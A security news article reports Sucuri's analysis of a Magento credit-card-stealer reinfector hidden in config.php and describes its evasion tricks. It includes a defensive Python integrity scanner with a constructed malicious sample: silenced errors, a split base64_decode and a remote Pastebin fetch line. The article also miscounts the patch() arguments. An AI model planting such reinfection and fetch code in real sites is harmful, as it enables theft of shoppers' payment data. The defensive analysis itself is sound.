
Magento credit card stealer Reinfector allows reinfect sites with malicious code


Cybercriminals used the ‘credit card stealer reinfector’ to reinfect the websites and continue to steal personal and financial data.

Researchers at Sucuri reported crooks are using a very simple evasion technique to reinfect Magento websites after their malicious code has been removed.

Cybercriminals have devised a method to hide the malicious code, the ‘credit card stealer reinfector’, used to reinfect the websites and continue to steal personal and financial data.

The credit card stealer reinfector is hidden inside the default configuration file (config.php) of Magento installs. Because that file is included from the main index.php, the reinfector is loaded on every page a user visits, and each load re-injects the malicious code into multiple files of the website.

Researchers highlighted that the config.php file is generated automatically during the installation of the Magento instance, and administrators or website owners usually never change it afterwards.

“This code is a prime candidate for infections once it is included right on the main index.php, loading at every page.” reads the analysis published by the experts.

“On the first block, we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content into specific files related to the payment process or user control:

/app/code/core/Mage/Payment/Model/Method/Cc.php
/app/code/core/Mage/Payment/Model/Method/Abstract.php
/app/code/core/Mage/Customer/controllers/AccountController.php
/app/code/core/Mage/Customer/controllers/AddressController.php
/app/code/core/Mage/Admin/Model/Session.php
/app/code/core/Mage/Admin/Model/Config.php
/app/code/core/Mage/Checkout/Model/Type/Onepage.php
/app/code/core/Mage/Checkout/Model/Type/Abstract.php

The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it”

The malicious code was stored on Pastebin; fetching it from a legitimate, widely used service helps the attackers stay under the radar.

Experts pointed out that the reinfector code they analyzed is able to bypass security scanners.

“The mechanism the attackers add “error_reporting(0);” is very interesting. It avoids any error leading to the discovery of the infection.” states the post.


The patch() function is used to inject the code that steals confidential information into Magento files. It takes 4 arguments: the path of a folder, the name of the file in that path to be infected, the file size used to check whether the given file needs to be reinfected, the name of a new file to be created, and the remote URL from which the malicious code will be downloaded.

Experts noticed that the base64_decode() function name is split into multiple string fragments to evade detection by security scanners.
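The traits described above (code living in config.php, a file-size check driving reinfection of the listed core files, a split base64_decode() name, error_reporting(0) and a Pastebin download) translate directly into a defensive integrity check. The following script is an added example written for this article, not Sucuri's code or any Magento tool: it records size and SHA-256 of includes/config.php and the core files the analysis names, rescans them against that baseline, and flags the indicators after collapsing concatenated string literals so a split function name reassembles. The sample "infected" config.php it plants is a constructed stand-in carrying only those traits, and the Pastebin path in it is a placeholder.

```python
"""Defensive integrity check for a Magento tree (added example, not Sucuri's code).

Baselines the files named in the analysis, then flags files that changed and PHP
source showing the reinfector's traits. The samples below are constructed."""
import hashlib
import re
import tempfile
from pathlib import Path

# config.php plus the core files the analysis lists as targets of patch()
TARGET_FILES = [
    "includes/config.php",
    "app/code/core/Mage/Payment/Model/Method/Cc.php",
    "app/code/core/Mage/Payment/Model/Method/Abstract.php",
    "app/code/core/Mage/Customer/controllers/AccountController.php",
    "app/code/core/Mage/Customer/controllers/AddressController.php",
    "app/code/core/Mage/Admin/Model/Session.php",
    "app/code/core/Mage/Admin/Model/Config.php",
    "app/code/core/Mage/Checkout/Model/Type/Onepage.php",
    "app/code/core/Mage/Checkout/Model/Type/Abstract.php",
]

# Indicators from the analysis, as regexes over (normalized) PHP source
INDICATORS = {
    "error_reporting_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "pastebin_reference": re.compile(r"pastebin\.com", re.I),
    "remote_fetch": re.compile(r"(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I),
}
_B64 = re.compile(r"base64_decode", re.I)

# Heuristic: 'bas' . 'e64_dec' . 'ode'  ->  'base64_decode' (two literals joined by a dot)
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\.\s*(['"])([^'"]*)\3""")


def normalize_php(src: str) -> str:
    """Collapse concatenated string literals until nothing more can be joined."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", src)
    return src


def scan_source(src: str) -> list[str]:
    """Return the names of the indicators present in one PHP source text."""
    normalized = normalize_php(src)
    found = [name for name, pat in INDICATORS.items() if pat.search(normalized)]
    # base64_decode visible only after reassembly means the name was deliberately split
    if _B64.search(normalized) and not _B64.search(src):
        found.append("split_base64_decode")
    return found


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(root: Path) -> dict[str, tuple[int, str]]:
    """Record size and SHA-256 of every target file present in a known-clean tree."""
    return {rel: ((root / rel).stat().st_size, sha256_of(root / rel))
            for rel in TARGET_FILES if (root / rel).is_file()}


def scan_tree(root: Path, baseline: dict[str, tuple[int, str]]) -> dict[str, list[str]]:
    """Compare each target file with the baseline and scan it for indicators."""
    report = {}
    for rel in TARGET_FILES:
        p = root / rel
        findings = []
        if not p.is_file():
            if rel in baseline:
                findings.append("missing")
        else:
            current = (p.stat().st_size, sha256_of(p))
            if rel not in baseline:
                findings.append("not_in_baseline")
            elif baseline[rel] != current:
                findings.append("modified_since_baseline")
            findings.extend(scan_source(p.read_text(errors="replace")))
        if findings:
            report[rel] = findings
    return report


# Constructed samples (not real malware): a benign config.php and one carrying the traits
CLEAN_CONFIG = "<?php\n$config = array('db' => 'localhost');\n"
INFECTED_CONFIG = (
    "<?php\nerror_reporting(0);\n"
    "$d = 'bas' . 'e64_dec' . 'ode';\n"
    "$body = file_get_contents('https://paste' . 'bin.com/raw/EXAMPLE_PLACEHOLDER');\n"
    "$config = array('db' => 'localhost');\n"
)


def demo() -> dict[str, list[str]]:
    """Build a clean tree, baseline it, plant the constructed sample, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in TARGET_FILES:
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text("<?php\n// placeholder core file\n")
        (root / "includes/config.php").write_text(CLEAN_CONFIG)
        baseline = build_baseline(root)
        assert scan_tree(root, baseline) == {}  # clean tree: nothing to report
        (root / "includes/config.php").write_text(INFECTED_CONFIG)
        (root / TARGET_FILES[1]).write_text("<?php\n// placeholder core file\n$x = 1;\n")
        return scan_tree(root, baseline)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, "->", ", ".join(findings))
```

Run build_baseline() against a fresh install or a verified-clean backup and store the result outside the web root; a later scan_tree() then reports any of the listed files whose size or hash moved, which catches a reinfection even when the injected code uses string tricks the regexes do not anticipate. The concatenation collapse is a heuristic (it does not follow variable assignments), so treat its output as a triage signal rather than proof of cleanliness.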

“As a rule of thumb, on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified quickly. We advise you to do it first thing. Many times, removing just the infection that you have a main concern about is not enough. You should always assume someone is out there ready to catch you off guard.” conclude the researchers.

“For Magento infections like this one, you can use our step-by-step guide on how to identify a hack and clean a compromised Magento site.”


Pierluigi Paganini

(Security Affairs – credit card stealer reinfector, Magento)
